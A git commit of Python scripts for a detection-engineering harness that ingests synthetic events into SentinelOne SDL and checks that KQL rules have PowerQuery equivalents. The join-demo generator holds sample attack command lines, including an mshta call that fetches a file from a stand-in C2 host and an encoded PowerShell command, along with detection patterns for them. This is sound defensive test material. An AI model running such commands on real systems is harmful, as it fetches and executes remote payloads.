Initial commit: KQL ↔ SDL PowerQuery proof of equivalence

This commit is contained in:
marc
2026-06-01 09:57:14 +02:00
commit 23cbaa9c08
91 changed files with 5966 additions and 0 deletions
+34
View File
@@ -0,0 +1,34 @@
#!/usr/bin/env python3
"""Count duplicate timestamps within the generated JSONL.
SDL appears to dedupe addEvents by (session, ts) - events sharing a ts
within the same session are silently dropped. If our generator emits many
events at colliding ts_epoch_ms values, only one of each cluster survives.
"""
import json
from collections import Counter, defaultdict
from pathlib import Path
JSONL = Path(__file__).resolve().parents[1] / "sample_data" / "events.jsonl"

# Per event_type: how many events were seen, and which ts_epoch_ms values.
per_type_total = Counter()
per_type_unique = defaultdict(set)
# Distinct ts_epoch_ms values regardless of event_type.  The module docstring
# describes the dedupe key as (session, ts), so events of *different* types
# sharing a ts would also collide if they are sent in the same session.
all_unique = set()

with JSONL.open(encoding="utf-8") as f:
    for line in f:
        if not line.strip():
            # Tolerate blank/trailing lines instead of crashing in json.loads.
            continue
        r = json.loads(line)
        et = r["event_type"]
        ts = r["ts_epoch_ms"]
        per_type_total[et] += 1
        per_type_unique[et].add(ts)
        all_unique.add(ts)

print(f"{'event_type':30s} {'events':>8} {'uniq_ts':>8} {'collision_loss%':>16}")
print("-" * 70)
for et in sorted(per_type_total):
    n = per_type_total[et]
    u = len(per_type_unique[et])
    # Share of events that would vanish if only one event per ts survives.
    loss = 100 * (n - u) / n if n else 0
    print(f"{et:30s} {n:>8} {u:>8} {loss:>15.1f}%")
print("-" * 70)
grand_total = sum(per_type_total.values())
print(f"{'TOTAL':30s} {grand_total:>8} "
      f"{sum(len(s) for s in per_type_unique.values()):>8}")
# Cross-type view: unique timestamps when event_type is ignored.
print(f"{'TOTAL (any type)':30s} {grand_total:>8} {len(all_unique):>8}")
+101
View File
@@ -0,0 +1,101 @@
#!/usr/bin/env python3
"""Diagnose why most of our 445 generated events are not queryable in SDL.
Strategy:
1. Take 5 CommonSecurityLog events straight from the generated JSONL,
decorate them with a unique probe marker, and ingest as a single batch.
2. Wait 10 s for indexing.
3. Query for the marker to confirm they are queryable.
4. Then bulk-ingest the entire JSONL and report per-event-type counts in SDL
vs counts in the local file - to expose where the loss happens.
"""
from __future__ import annotations
import json
import sys
import time
from collections import Counter
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query, ingest_jsonl, _clean_attrs # noqa: E402
JSONL = ROOT / "sample_data" / "events.jsonl"
MARKER = f"loss-probe-{int(time.time())}"
# Upper bound on how many CommonSecurityLog events go into the marker probe.
PROBE_BATCH_SIZE = 5

# ---------------------------------------------------------------------------
# Step 1: per-type counts in the local file
# ---------------------------------------------------------------------------
# Parse the file once and reuse the records for step 2; blank lines are
# skipped so a trailing newline cannot crash json.loads.
with JSONL.open(encoding="utf-8") as f:
    records = [json.loads(line) for line in f if line.strip()]
local_counts = Counter(rec["event_type"] for rec in records)

print("=" * 80)
print("Local JSONL event_type counts")
print("=" * 80)
for k, v in sorted(local_counts.items()):
    print(f" {k:30s} {v}")
print(f" {'TOTAL':30s} {sum(local_counts.values())}")

# ---------------------------------------------------------------------------
# Step 2: pick up to PROBE_BATCH_SIZE CSL events, mark them, ingest, query
# ---------------------------------------------------------------------------
csl_events = []
for rec in records:
    if rec["event_type"] != "CommonSecurityLog":
        continue
    # Tag a copy so the parsed records stay untouched.
    tagged = {**rec, "loss_marker": MARKER}
    ts_ms = int(tagged["ts_epoch_ms"])
    csl_events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
                       "thread": "T1", "attrs": _clean_attrs(tagged)})
    if len(csl_events) >= PROBE_BATCH_SIZE:
        break

print()
print("=" * 80)
# Report the number actually found rather than a hard-coded 5.
print(f"Step 2: ingesting {len(csl_events)} marker-tagged CSL events ({MARKER})")
print("=" * 80)
if csl_events:
    r = add_events(csl_events)
    print(f"addEvents -> {json.dumps(r)}")
    print("waiting 10 s for indexing ...")
    time.sleep(10)
    probe_q = f"loss_marker='{MARKER}' | group n = count() by event_type"
    r = power_query(probe_q, "1h")
    print(f"probe query (1h) -> matching={r.get('matchingEvents')}, rows={r.get('values')}")
else:
    # Nothing to probe with; do not send an empty addEvents batch.
    print("no CommonSecurityLog events in the JSONL; skipping marker probe")

# ---------------------------------------------------------------------------
# Step 3: full bulk ingest of the file via the harness helper
# ---------------------------------------------------------------------------
print()
print("=" * 80)
print("Step 3: full bulk ingest of every event in JSONL")
print("=" * 80)
sent = ingest_jsonl(JSONL)
print(f"ingest_jsonl reports {sent} events sent")
print("waiting 20 s for indexing ...")
time.sleep(20)

# ---------------------------------------------------------------------------
# Step 4: per-event-type count in SDL
# ---------------------------------------------------------------------------
print()
print("=" * 80)
print("Step 4: SDL counts by event_type")
print("=" * 80)
print(f"{'event_type':30s} {'local':>8} {'SDL':>8} {'loss%':>8}")
print("-" * 60)
for et in sorted(local_counts):
    q = f"event_type='{et}' | group n = count()"
    r = power_query(q, "1h")
    sdl_n = 0
    if r.get("values"):
        # First cell of the first row holds the count; treat null as 0.
        sdl_n = int(r["values"][0][0] or 0)
    local_n = local_counts[et]
    loss = 100 * (local_n - sdl_n) / local_n if local_n else 0
    print(f"{et:30s} {local_n:>8} {sdl_n:>8} {loss:>7.0f}%")
+46
View File
@@ -0,0 +1,46 @@
#!/usr/bin/env python3
"""Probe what data is actually queryable in SDL after ingestion."""
from __future__ import annotations
import json
import sys
import time
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query # noqa: E402
# (label, PowerQuery) pairs; every query is run over the last 30 days.
QUERIES = [
    (
        "any serverHost=kql-proof",
        "serverHost='kql-proof' | columns event_type, UserPrincipalName, ts_epoch_ms | limit 5",
    ),
    (
        "count by event_type",
        "serverHost='kql-proof' | group n=count() by event_type",
    ),
    (
        "SigninLogs by user",
        "serverHost='kql-proof' event_type='SigninLogs' | group n=count() by UserPrincipalName",
    ),
    (
        "SigninLogs min/max ts_epoch_ms",
        "serverHost='kql-proof' event_type='SigninLogs' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()",
    ),
    (
        "recent SigninLogs (no time filter)",
        "serverHost='kql-proof' event_type='SigninLogs' Location='RU' | columns UserPrincipalName, Location | limit 10",
    ),
    (
        "SecurityEvent EventID column type",
        "serverHost='kql-proof' event_type='SecurityEvent' | columns EventID, NewProcessName | limit 5",
    ),
    (
        "Audit OperationName",
        "serverHost='kql-proof' event_type='AuditLogs' | columns OperationName | limit 10",
    ),
]

for label, query in QUERIES:
    print("=" * 80)
    print(f"# {label}")
    print(f" query: {query}")
    started = time.time()
    resp = power_query(query, start_time="30d")
    result_rows = resp.get("values") or []
    # Column descriptors may be dicts carrying a "name" key or bare values.
    col_names = []
    for col in resp.get("columns") or []:
        col_names.append(col.get("name") if isinstance(col, dict) else col)
    print(f" status={resp.get('status')} matching={resp.get('matchingEvents')} "
          f"rows={len(result_rows)} took={time.time()-started:.1f}s")
    if resp.get("status", "").startswith("error/"):
        # Dump the start of the error response for inspection.
        print(f" ERROR_BODY: {json.dumps(resp, indent=2)[:800]}")
    if not result_rows:
        continue
    print(f" cols: {col_names}")
    for record in result_rows[:5]:
        print(" ", dict(zip(col_names, record)))
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
"""Wider probe: try a variety of filters and start windows to find our data."""
import sys, time, json
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query
# (label, PowerQuery, start window) triples.
QUERIES = [
    (
        "event_type=SigninLogs 7d (no serverHost)",
        "event_type='SigninLogs' | columns UserPrincipalName | limit 5",
        "7d",
    ),
    (
        "event_type=SigninLogs 1h",
        "event_type='SigninLogs' | columns UserPrincipalName, ts_epoch_ms | limit 5",
        "1h",
    ),
    (
        "UserPrincipalName matching contoso",
        "UserPrincipalName='alice@contoso.com' | columns event_type, UserPrincipalName | limit 5",
        "1d",
    ),
    (
        "anything from xdr tenant 1h",
        "* | columns event_type, serverHost, logfile | limit 5",
        "1h",
    ),
    (
        "logfile contains kql-proof",
        "logfile contains 'kql-proof' | columns event_type | limit 5",
        "7d",
    ),
    (
        "contoso.com in attrs",
        "Identity contains 'contoso.com' | columns event_type, Identity | limit 5",
        "1d",
    ),
    (
        "test: count any events tenant-wide 5m",
        "* | group n=count()",
        "5m",
    ),
]

for label, query, start in QUERIES:
    print("=" * 80)
    print(f"# {label} (start={start})")
    print(f" q: {query}")
    began = time.time()
    resp = power_query(query, start_time=start)
    result_rows = resp.get("values") or []
    # Column descriptors may be dicts carrying a "name" key or bare values.
    col_names = []
    for col in resp.get("columns") or []:
        col_names.append(col.get("name") if isinstance(col, dict) else col)
    print(f" status={resp.get('status')} matching={resp.get('matchingEvents')} "
          f"rows={len(result_rows)} took={time.time()-began:.1f}s")
    if resp.get("status", "").startswith("error/"):
        print(f" ERROR: {json.dumps(resp)[:500]}")
    # At most five rows are shown, each as a column-name -> value mapping.
    for record in result_rows[:5]:
        print(" ", dict(zip(col_names, record)))
+198
View File
@@ -0,0 +1,198 @@
#!/usr/bin/env python3
"""Export each rule's KQL and PowerQuery to disk.
The exported `.pq` files are:
* SELF-CONTAINED and RUNNABLE — every template placeholder
(`{RECENT_MS}`) is substituted with a concrete value from the
current time anchor, so you can paste straight into SDL.
* PRETTY-PRINTED — one pipeline stage per line with continuation
indents, matching the style in pmoses-s1/claude-skills.
* HEADER-DECORATED — a `//`-comment block names the rule, describes
intent, lists field references, and tells the reader what
`startTime` to use when running the query.
* VALIDATED — after writing, every `.pq` is parsed for known
anti-patterns from the SentinelOne PowerQuery skill's pitfalls
list (literal `{` braces, deprecated `first()`/`last()`/
`percentile()`, leading `*` filter, missing leading pipe before
`join`/`union`, etc.). Errors abort the export so the published
repo never contains broken queries.
"""
from __future__ import annotations
import json
import re
import sys
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from rules import RULES, NOW, RECENT_START, BASELINE_START # noqa: E402
# ---------------------------------------------------------------------------
# Pretty-printer: turn a single-line PQ string into multi-line idiomatic form.
# ---------------------------------------------------------------------------
def pretty(pq: str) -> str:
    """Reflow a single-line PowerQuery into one pipeline stage per line.

    All whitespace runs are collapsed to one space, then the text is cut at
    every ``" | "``.  The piece before the first pipe (the initial filter) is
    emitted as-is; each later piece is emitted with a ``| `` prefix.  A
    ``group <aggs> by <fields>`` stage is expanded so each aggregate sits on
    its own line, followed by a separate ``by`` line.

    Returns the reflowed query joined with newlines (no trailing newline).
    """
    group_by = re.compile(
        r"^group\s+(.+?)\s+by\s+(.+)$", flags=re.IGNORECASE | re.DOTALL)

    flat = re.sub(r"\s+", " ", pq).strip()
    first, *rest = flat.split(" | ")
    first = first.strip()

    out: list[str] = []
    if first:
        out.append(first)

    for stage in (piece.strip() for piece in rest):
        hit = group_by.match(stage)
        if hit is None:
            # Ordinary stage: goes on one line unchanged.
            out.append("| " + stage)
            continue

        # Only commas outside parentheses separate aggregates.
        aggs = [a.strip() for a in _split_top_level_commas(hit.group(1))]
        # Every aggregate except the last carries a trailing comma.
        rendered = [a + "," for a in aggs[:-1]] + [aggs[-1]]
        out.append("| group " + rendered[0])
        out.extend(" " + item for item in rendered[1:])
        out.append(" by " + hit.group(2).strip())

    return "\n".join(out)
def _split_top_level_commas(s: str) -> list[str]:
out: list[str] = []
depth, cur = 0, []
for ch in s:
if ch == "(":
depth += 1; cur.append(ch)
elif ch == ")":
depth -= 1; cur.append(ch)
elif ch == "," and depth == 0:
out.append("".join(cur)); cur = []
else:
cur.append(ch)
if cur:
out.append("".join(cur))
return out
# ---------------------------------------------------------------------------
# Anti-pattern scanner — refuses to write a file containing known landmines.
# ---------------------------------------------------------------------------
# (regex, message) pairs.  A query is rejected when any regex matches it.
PITFALLS: list[tuple[str, str]] = [
    # Identifier-style placeholders, including names with digits such as
    # {RECENT_24H_MS}.  Regex quantifiers like {2,3} are deliberately not
    # matched.
    (r"\{[A-Za-z_][A-Za-z0-9_]*\}",
     "Unsubstituted template placeholder (e.g. {RECENT_MS}). "
     "Substitute before writing."),
    (r"\bfirst\s*\(",
     "first(x) is unreliable — use min_by(x, ts_epoch_ms)."),
    (r"\blast\s*\(",
     "last(x) is unreliable — use max_by(x, ts_epoch_ms)."),
    (r"\bpercentile\s*\(",
     "percentile(x, N) is not a real function — use p50/p95/p99."),
    (r"\bgroup_unique_values\s*\(",
     "group_unique_values does not exist — use array_agg_distinct(x, N)."),
    (r"(?m)^\s*\*\s*(\||$)",
     "Bare `*` as initial filter returns 500 — use `| limit 5` or "
     "`field = *`."),
    (r"(?m)^\s*(join|union)\b",
     "join/union must start with a leading `|`."),
    (r"(?m)^\s*#(cmdline|name|hash|ip|storylineid|username|dns)\b",
     "Shortcut fields (#cmdline, …) are unreliable across tenants — "
     "use the explicit field name."),
]


def scan(text: str) -> list[str]:
    """Return the message of every PITFALLS entry whose regex matches *text*.

    Messages come back in PITFALLS order; an empty list means no known
    anti-pattern was found.
    """
    return [msg for pat, msg in PITFALLS if re.search(pat, text)]
# ---------------------------------------------------------------------------
# Header builder
# ---------------------------------------------------------------------------
def header(rule: dict, recent_iso: str, now_iso: str) -> str:
    """Build the ``//`` comment banner placed above an exported query.

    Args:
        rule: mapping that provides ``id``, ``description`` and ``pq``.
        recent_iso: text shown as the recent-window cutoff.
        now_iso: text shown as the export time anchor.

    Returns:
        The banner as newline-joined ``//`` lines ending in one newline.

    The "Fields referenced" line is a heuristic: it lists capitalised
    identifiers found in ``rule["pq"]``, capped at ``max_fields`` entries.
    """
    keywords = {"and", "or", "not", "true", "false",
                "filter", "group", "by", "let", "columns",
                "sort", "limit", "join", "union", "in",
                "contains", "matches"}
    max_fields = 10

    # Quoted literals ('SigninLogs', "RU") and {PLACEHOLDER} tokens are not
    # field names; blank them before looking for identifiers.
    scrubbed = re.sub(
        r"'[^']*'|\"[^\"]*\"|\{[A-Za-z_][A-Za-z0-9_]*\}", " ", rule["pq"])
    field_refs = sorted({f for f in re.findall(
        r"\b[A-Z][A-Za-z0-9_]+\b", scrubbed)
        if f.lower() not in keywords})

    shown = ", ".join(field_refs[:max_fields])
    if len(field_refs) > max_fields:
        # Tell the reader the list was cut short.
        shown += ", …"

    # Keep a multi-line description inside the comment block: every line
    # gets its own `//` prefix.
    description = str(rule["description"]).splitlines() or [""]

    lines = [
        f"// Rule: {rule['id']}",
        *(f"// {d}" for d in description),
        "//",
        "// Source KQL: see ../kql/" + rule['id'] + ".kql",
        "//",
        "// HOW TO RUN",
        "// curl POST {sdl}/api/powerQuery with this body, OR paste in",
        "// the SDL console. Set startTime = '2h' (or wider) so the API",
        "// scans the freshly-ingested epochs that contain the events.",
        "//",
        f"// Time anchor at export: NOW = {now_iso}",
        f"// Recent-window cutoff: {recent_iso}",
        "// (`ts_epoch_ms` below is that cutoff expressed in ms.",
        "// Re-run harness/export_rules.py to refresh after regenerating",
        "// sample_data/events.jsonl.)",
        "//",
        "// Fields referenced: " + shown,
        "//",
        "// EDITING NOTE",
        "// Every line that starts with `|` is a pipeline stage. Each `|`",
        "// is REQUIRED. If you delete one (e.g. while changing a literal",
        "// on the same line as a stage), SDL re-parses the keyword that",
        "// follows as a search term and rejects the query with errors",
        "// like `'estimate_distinct' is a grouping function`.",
    ]
    return "\n".join(lines) + "\n"
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main() -> None:
    """Render, validate and write every rule's ``.pq`` and ``.kql`` file.

    The export is all-or-nothing: every rule is rendered and scanned first,
    and files are written only when no rule tripped the anti-pattern scanner.
    On failure the offending rules are listed and the process exits with
    status 1 without writing anything.
    """
    recent_ms = int(RECENT_START.timestamp() * 1000)
    recent_iso = RECENT_START.isoformat()
    now_iso = NOW.isoformat()

    rendered: list[tuple[dict, str]] = []
    failures: list[tuple[str, list[str]]] = []
    for r in RULES:
        # 1. substitute placeholders, 2. pretty-print, 3. scan
        body = pretty(r["pq"].replace("{RECENT_MS}", str(recent_ms)))
        bad = scan(body)
        if bad:
            failures.append((r["id"], bad))
        else:
            rendered.append((r, body))

    if failures:
        print("✗ Export failed — anti-patterns detected:")
        for rid, msgs in failures:
            print(f" {rid}")
            for m in msgs:
                print(f" - {m}")
        sys.exit(1)

    # 4. write — reached only when every rule passed the scan.
    pq_dir = ROOT / "pq"
    kql_dir = ROOT / "kql"
    pq_dir.mkdir(parents=True, exist_ok=True)
    kql_dir.mkdir(parents=True, exist_ok=True)
    for r, body in rendered:
        text = header(r, recent_iso, now_iso) + "\n" + body + "\n"
        # The banner and rule text may contain non-ASCII characters, so the
        # encoding is pinned rather than left to the platform default.
        (pq_dir / f"{r['id']}.pq").write_text(text, encoding="utf-8")
        # Mirror the .kql (verbatim, no substitution)
        (kql_dir / f"{r['id']}.kql").write_text(
            r["kql"].strip() + "\n", encoding="utf-8")

    print(f"✓ Exported {len(RULES)} rules to kql/ and pq/")
    print(f" (RECENT_MS = {recent_ms} = {recent_iso})")


if __name__ == "__main__":
    main()
+39
View File
@@ -0,0 +1,39 @@
#!/usr/bin/env python3
"""Find SDL's age cutoff for addEvents by sending probe events at increasing
ages and seeing which ones become queryable."""
import json, sys, time, uuid
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query
TS_NOW_MS = int(time.time() * 1000)
PROBE = uuid.uuid4().hex[:8]
# 30s, 5min, 30min, 1h, 2h, 4h, 6h, 12h, 24h
ages_min = [0.5, 5, 30, 60, 120, 240, 360, 720, 1440]

# One unique string marker per age, so each event can be recognised in the
# query result without relying on how the numeric age_min comes back.
probes = [(f"{PROBE}_{i:02d}", age) for i, age in enumerate(ages_min)]
events = [
    {
        # addEvents timestamps are sent as nanoseconds-since-epoch strings.
        "ts": str((TS_NOW_MS - int(age * 60 * 1000)) * 1_000_000),
        "sev": 3, "thread": "T1",
        "attrs": {"event_type": "CommonSecurityLog",
                  "probe": probe_id, "age_min": age},
    }
    for probe_id, age in probes
]
print(f"Sending {len(events)} events at ages {ages_min} min")
r = add_events(events)
print(f"addEvents -> {json.dumps(r)}")
print("\nWaiting 12 s ...")
time.sleep(12)
print(f"\nQuerying probe '{PROBE}' over last 48h ...")
res = power_query(f"probe contains '{PROBE}' | columns probe, age_min | limit 100", "48h")
n = res.get("matchingEvents", 0)
vals = res.get("values") or []
print(f"matching={n}")
# Column order follows the `columns probe, age_min` stage of the query.
got_probes = {row[0] for row in vals if row}
got_ages = {row[1] for row in vals if len(row) > 1}
print(f"\n{'age_min':>8} {'sent':>6} {'queryable':>10}")
for probe_id, age in probes:
    # Primary match is the string marker; the numeric age is kept as a
    # fallback so the earlier matching rule still counts.
    landed = "YES" if (probe_id in got_probes or age in got_ages) else "NO"
    print(f" {age:>6} {'yes':>6} {landed:>10}")
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
"""Send one event per batch (separate addEvents call) at different ages,
each with a fresh session. This isolates whether SDL is rejecting based on
mixed-age batches or just on event age."""
import json, sys, time, uuid, importlib
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
PROBE = uuid.uuid4().hex[:8]
ages_min = [0.5, 5, 30, 60, 120, 240, 480, 720, 1440]
# Force a fresh session for *every* probe so we eliminate session dedup
import harness.sdl_client as sdl
results = []
for i, age in enumerate(ages_min):
    importlib.reload(sdl)  # re-roll the SESSION UUID
    ts_ms = int(time.time() * 1000) - int(age * 60 * 1000)
    pv = f"{PROBE}_{i:02d}"
    ev = {"ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
          "attrs": {"event_type": "CommonSecurityLog", "probe": pv,
                    "age_min": age}}
    # One event per addEvents call, so a batch never mixes ages.
    r = sdl.add_events([ev])
    print(f"age={age:>6} min session={sdl.SESSION[-12:]} addEvents={r}")
    results.append((age, pv))
print("\nWaiting 12 s ...")
time.sleep(12)
q = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
res = sdl.power_query(q, "48h")
n = res.get("matchingEvents", 0)
vals = res.get("values") or []
print(f"\nQuery matching={n}")
# Column order follows the `columns probe, age_min` stage of the query.
got_probes = {row[0] for row in vals if row}
got_ages = {row[1] for row in vals if len(row) > 1}
print(f"\n{'age_min':>8} {'queryable':>10}")
for age, pv in results:
    # Match on the unique string marker first; the numeric age is a
    # fallback so the earlier matching rule still counts.
    landed = "YES" if (pv in got_probes or age in got_ages) else "NO"
    print(f" {age:>6} {landed:>10}")
+220
View File
@@ -0,0 +1,220 @@
"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
identity sign_in failures x suspicious DNS x suspicious process_start
Joined on (user_name) and (host). Events are spread across the last 4 hours.
"""
from __future__ import annotations
import random
import time
from pathlib import Path
import sys
ROOT = Path(__file__).resolve().parent
sys.path.insert(0, str(ROOT))
from sdl_client import add_events, power_query # noqa: E402
# Wall-clock reference taken once at import, in epoch milliseconds.
NOW_MS = int(time.time() * 1000)
_HOUR_MS = 60 * 60 * 1000
WINDOW_MS = 4 * _HOUR_MS  # 4h

# --- Personas that will land in ALL 3 streams (these will join) --------------
# Each entry is (user, host).
JOIN_TARGETS = [
    ("alice.smith", "wks-alice-01"),
    ("bob.jones", "wks-bob-02"),
    ("carol.nguyen", "wks-carol-03"),
]

# Users that only fail logins (no DNS/proc match) → in failed-only
NOISE_FAILED_USERS = [
    "dave.kim",
    "erin.lopez",
    "frank.singh",
]

# Hosts that have suspicious procs but no DNS hit → noise on proc side
NOISE_PROC_HOSTS = [
    "srv-build-01",
    "srv-jenkins-02",
]

# Domain pools used for DNS events.
SUSPECT_DOMAINS = [
    "c2.example.net",
    "suspect.example.org",
    "c2.example.io",
]
BENIGN_DOMAINS = [
    "microsoft.com",
    "google.com",
    "github.com",
]

# Command-line pools used for process_start events.
SUSPECT_CMDS = [
    "powershell.exe -enc SQBFAFgAIA==",
    "rundll32.exe shell32.dll,Control_RunDLL",
    "mshta.exe http://c2.example.net/x.hta",
]
BENIGN_CMDS = [
    "explorer.exe",
    "chrome.exe --no-sandbox",
    "code.exe",
]
def rand_ts() -> str:
    """Return a random timestamp from the last WINDOW_MS, as a ns-epoch string.

    A millisecond offset in ``[0, WINDOW_MS - 1]`` is subtracted from NOW_MS
    and the result is scaled to nanoseconds.
    """
    offset_ms = random.randint(0, WINDOW_MS - 1)
    return str((NOW_MS - offset_ms) * 1_000_000)
def evt(ts_ns: str, attrs: dict) -> dict:
    """Wrap *attrs* in an event dict with fixed ``sev`` 3 and ``thread`` "T1"."""
    return dict(ts=ts_ns, sev=3, attrs=attrs, thread="T1")
def gen_failed_signins() -> list[dict]:
    """Generate identity ``sign_in`` events: failures plus a few successes.

    Emitted in this order:
      * 8-15 failures per JOIN_TARGETS user, each with a random
        ``203.0.113.x`` source IP;
      * 2-6 failures per NOISE_FAILED_USERS user, without a source IP;
      * 3 successes per JOIN_TARGETS user.
    """
    def sign_in(user, status, with_src_ip=False):
        # The timestamp is drawn before the optional source IP so the
        # sequence of random draws matches the inline form.
        ts = rand_ts()
        attrs = {
            "dataSource.category": "identity",
            "dataSource.vendor": "azure-ad",
            "activity_name": "sign_in",
            "status": status,
            "user.name": user,
        }
        if with_src_ip:
            attrs["src_endpoint.ip"] = f"203.0.113.{random.randint(2,254)}"
        return evt(ts, attrs)

    out = []
    # Users in JOIN_TARGETS get many failures (so they "stand out")
    for user, _ in JOIN_TARGETS:
        out.extend(sign_in(user, "failure", with_src_ip=True)
                   for _ in range(random.randint(8, 15)))
    # Noise: failed-only users
    for user in NOISE_FAILED_USERS:
        out.extend(sign_in(user, "failure")
                   for _ in range(random.randint(2, 6)))
    # Some successes (should be filtered out by status='failure')
    for user, _ in JOIN_TARGETS:
        out.extend(sign_in(user, "success") for _ in range(3))
    return out
def gen_dns() -> list[dict]:
    """Generate network ``dns_query`` events.

    Emitted in this order:
      * per JOIN_TARGETS (user, host): 3-6 queries for a suspect domain,
        then 5 queries for a benign domain;
      * per extra user ("greg.wu", "helen.park"): 3 suspect-domain queries
        from a ``wks-<first name>-99`` host.
    """
    def dns_query(user, host, domains):
        # The timestamp is drawn before the domain so the sequence of
        # random draws matches the inline form.
        ts = rand_ts()
        return evt(ts, {
            "dataSource.category": "network",
            "dataSource.vendor": "zeek",
            "activity_name": "dns_query",
            "user.name": user,
            "device.hostname": host,
            "dns.question.name": random.choice(domains),
        })

    out = []
    for user, host in JOIN_TARGETS:
        # suspicious DNS for these users on their hosts
        out.extend(dns_query(user, host, SUSPECT_DOMAINS)
                   for _ in range(random.randint(3, 6)))
        # benign DNS noise from same users
        out.extend(dns_query(user, host, BENIGN_DOMAINS) for _ in range(5))
    # Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
    for user in ["greg.wu", "helen.park"]:
        host = f"wks-{user.split('.')[0]}-99"
        out.extend(dns_query(user, host, SUSPECT_DOMAINS) for _ in range(3))
    return out
def gen_process() -> list[dict]:
    """Generate process ``process_start`` events.

    Emitted in this order:
      * per JOIN_TARGETS host: 4-8 events with a suspect command line,
        then 5 events with a benign command line;
      * per NOISE_PROC_HOSTS host: 3 events with a suspect command line.
    """
    def process_start(host, commands):
        # The timestamp is drawn before the command line so the sequence of
        # random draws matches the inline form.
        ts = rand_ts()
        return evt(ts, {
            "dataSource.category": "process",
            "dataSource.vendor": "sentinelone",
            "activity_name": "process_start",
            "device.hostname": host,
            "process.cmd_line": random.choice(commands),
        })

    out = []
    for _, host in JOIN_TARGETS:
        out.extend(process_start(host, SUSPECT_CMDS)
                   for _ in range(random.randint(4, 8)))
        # benign procs on the same hosts
        out.extend(process_start(host, BENIGN_CMDS) for _ in range(5))
    # Noise: suspicious procs on hosts that don't appear in DNS stream
    for host in NOISE_PROC_HOSTS:
        out.extend(process_start(host, SUSPECT_CMDS) for _ in range(3))
    return out
def chunked(seq: list, n: int):
    """Yield consecutive slices of *seq* of length *n* (the last may be shorter)."""
    starts = range(0, len(seq), n)
    yield from (seq[start:start + n] for start in starts)
def main() -> None:
    """Generate the demo events, ingest them in batches, then run the join.

    Events are sent in batches of 200 under the ``join-demo`` session info;
    any batch whose response status is not ``"success"`` raises
    ``RuntimeError``.  After a 20 s pause the 3-way join PowerQuery is run
    over the last 4h and a summary of the response is printed.
    """
    random.seed(42)
    events = gen_failed_signins() + gen_dns() + gen_process()
    random.shuffle(events)
    print(f"Generated {len(events)} events across the last 4h")
    sent = 0
    for batch in chunked(events, 200):
        r = add_events(batch, session_info={
            "serverHost": "join-demo",
            "logfile": "join-demo.jsonl",
            "parser": "json",
        })
        if r.get("status") != "success":
            raise RuntimeError(f"addEvents failed: {r}")
        sent += len(batch)
        print(f" ingested {sent}/{len(events)}")
        time.sleep(0.25)
    print(f"Done. {sent} events ingested.")
    # Quick verification: run the user's PowerQuery against last 4h
    pq = r'''| join
failed = (
dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
| columns user_name = user.name
| group failed_signins = count() by user_name
),
dns = (
dataSource.category = 'network' AND activity_name = 'dns_query'
AND dns.question.name matches "(c2|suspect)\.example\."
| columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
),
proc = (
dataSource.category = 'process' AND activity_name = 'process_start'
AND process.cmd_line matches "(powershell|rundll32|mshta)"
| columns host = device.hostname, cmd_line = process.cmd_line
)
on failed.user_name = dns.user_name, dns.host = proc.host'''
    print("\nWaiting 20s for SDL indexing, then running the join...")
    time.sleep(20)
    res = power_query(pq, start_time="4h")
    if not isinstance(res, dict):
        print(res)
        return

    print(f"PowerQuery response keys: {list(res.keys())}")
    # The other harness scripts read result rows from "values" and the hit
    # count from "matchingEvents"; the older key guesses stay as fallbacks.
    matches = res.get("values")
    if matches is None:
        matches = res.get("matches") or res.get("data") or res.get("results")
    if matches is not None:
        print(f"status={res.get('status')} matching={res.get('matchingEvents')}")
        print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
    else:
        # Nothing recognisable: show the whole response.
        print(res)


if __name__ == "__main__":
    main()
+42
View File
@@ -0,0 +1,42 @@
#!/usr/bin/env python3
"""After bash run_proof.sh, check what's queryable for the latest run."""
import sys, json, time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query
# Look at the latest proof_run_id from the log
log = (ROOT / "reports" / "run.log").read_text()
import re
# Take the LAST occurrence: if the log holds several runs, the first match
# would be the oldest run rather than the latest one.
run_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
RUN_ID = run_ids[-1] if run_ids else None
print(f"Latest proof_run_id from log: {RUN_ID}")

# (label, query) pairs.  Run-scoped queries are only included when a run id
# was found, so we never query for the literal string 'None'.
QUERIES = []
if RUN_ID is not None:
    QUERIES.append((
        "any event for this run",
        f"proof_run_id='{RUN_ID}' | group n=count()",
    ))
    QUERIES.append((
        "by event_type for this run",
        f"proof_run_id='{RUN_ID}' | group n=count() by event_type",
    ))
else:
    print("no proof_run_id found in reports/run.log; skipping run-scoped queries")
QUERIES.append((
    "all kql-proof logfile (any run)",
    "logfile contains 'kql-proof' | group n=count() by event_type",
))
if RUN_ID is not None:
    QUERIES.append((
        "rule 1 raw query that errors",
        f"proof_run_id='{RUN_ID}' event_type='SigninLogs' | filter ts_epoch_ms >= 0 "
        "| group LocationCount = estimate_distinct(Location), "
        "LocationList = group_unique_values(Location), LogonCount = count() "
        "by UserPrincipalName, AppDisplayName | filter LocationCount >= 3",
    ))

for label, q in QUERIES:
    print()
    print("=" * 80)
    print(f"# {label}")
    print(f" q: {q}")
    t = time.time()
    r = power_query(q, "1h")
